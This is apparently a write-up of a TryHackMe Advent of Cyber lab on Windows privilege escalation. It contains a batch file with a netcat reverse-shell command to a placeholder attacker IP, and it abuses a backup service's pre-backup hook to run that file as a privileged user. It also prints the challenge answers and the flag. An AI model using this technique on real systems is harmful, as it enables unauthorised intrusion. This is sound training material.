TryHackMe – Advent of Cyber 3 – Day 13

Day 13 – They Lost The Plan!

To complete Day 13’s challenges we’ll need to use the target machine AOC_WinPrivEsc. This will open a Windows VM that we can access in addition to the AttackBox to complete our tasks for the day…

Question 1

Complete the username: p…..

Boot the target machine AOC_WinPrivEsc and access a PowerShell terminal. Use the command ‘net users’ to pull up a list of users on the machine:

Powershell 'net users' command.

Answer:

(Highlight below to see answer):

pepper

Question 2

What is the OS version?

You can use the systeminfo command to find information about the OS:

Powershell systeminfo command.

Answer:

(Highlight below to see answer):

10.0.17763 N/A Build 17763

Question 3

What backup service did you find running on the system?

Use the ‘wmic service list’ command to display the running services. Go through the list until you find the backup service:

The 'wmic service list' command.

Alternatively, knowing that we are looking for a backup service, we can also use something like ‘wmic service list | findstr “Backup”:

Piping 'wmic service list' into 'findstr'.

Answer:

(Highlight below to see answer):

IperiusSvc

Question 4

What is the path of the executable for the backup service you have identified?

The path can also be found in the information displayed from the ‘wmic service list’ command:

Using findstr with wmic service list.

Answer:

(Highlight below to see answer):

C:\Program Files (x86)\Iperius Backup\IperiusService.exe

Question 5

Run the whoami command on the connection you have received on your attacking machine. What user do you have?

Open notepad and save the following as evil.bat on the desktop of the target machine AOC_WinPrivEsc:

@echo off

C:\Users\McSkidy\Downloads\nc.exe ATTACK_IP 1337 -e cmd.exe

Contents of evil.bat

You’ll need to replace ATTACK_IP with the IP of your AttackBox. When you save, be sure to select file type of ‘All files’ (i.e. not .txt) so that the file will be recognized as a .bat file. If you save it as a .txt file, the .txt extension will be appended to the name and the attack will not work.

Start the Iperius Backup Service; you can do this by searching for it in the Start menu.

Click ‘Create New Backup’:

Create new backup

Select ‘Add Folder’:

Add folder.

Then enter the Path C:\Users\McSkidy\Documents

Selecting the 'Documents' folder.

Navigate one tab over to the ‘Destinations’ tab. This time select a Path of C:\Users\McSkidy\Desktop:

Selecting the Desktop path.

Navigate to the ‘Other Processes’ tab and select ‘Run a program or external file:’ checkbox under ‘Before backup’. Select the evil.bat file:

Finish creating the backup.

Finish creating the backup and navigate to the AttackBox, where we’ll start a netcat listener using the command ‘nc -lvnp 1337’.

Setting up a netcat listener.

Now we’re ready to launch our attack! Navigate back to Iperius Backup Solutions on the target machine, right-click on the Backup job ‘Documents’, and select ‘Run backup as service’:

Run the backup as a service.

If you’ve done this correctly, you should receive a shell on your AttackBox. You can run the whoami command to determine our current user:

Return to the netcat listener to use shell.

Answer:

(Highlight below to see answer):

the-grinch-hack\thegrinch

Question 6

What is the content of the flag.txt file?

Navigate to the grinch’s user directory using the ‘cd’ command. Once inside, explore the directory for interesting files. The flag.txt file can be found in the Documents folder. List files by using the ‘dir’ command:

Investigating the Documents folder.

Now we can use ‘type’ to print the contents of flag.txt:

Using the 'type' command in a Windows system to read file contents.

Answer:

(Highlight below to see answer):

THM-736635221

Question 7

The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?

The ‘Documents’ folder also contains a ‘Schedule.txt’, which we can again read using the ‘type’ command:

Using the 'type' command to read Schedule.txt.

Answer:

(Highlight below to see answer):

jazzercize